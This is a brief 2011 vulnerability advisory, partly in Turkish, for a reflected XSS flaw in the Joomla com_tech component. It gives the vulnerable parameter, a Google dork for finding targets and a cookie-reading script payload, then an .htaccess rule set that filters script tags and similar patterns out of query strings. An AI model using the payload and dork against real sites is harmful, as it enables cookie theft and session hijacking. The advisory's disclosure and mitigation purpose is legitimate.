<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################

# Author : [qrusher-] ~ Bug Researchers

# Date : 07.08.2011

# Name : Joomla com_tech

# Bug Type : XSS

# Infection : Bilgi erisimi saglanilabilir.

# Example Vuln :

[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]

[+] Dork:inurl: com_foto

[+] Demo: http://site/index.php?option=com_tech&task=

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

><script>alert(document.cookie)</script> // Post Search Box

< -- bug code end of -- >


< ------------------- header data end of ------------------- >


Pek çok alternatif mevcut ama .htaccess dosyasini biraz düzenlersek sorun ortadan kalacaktir.


< -- bug code start -- >


.htaccess Dosyasinin içine assagidaki kodu yazin ve böylece sitenize yapilan herhangi bir XSS
saldirisinda siteniz hata verecektir.

RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]


< -- bug code end of -- >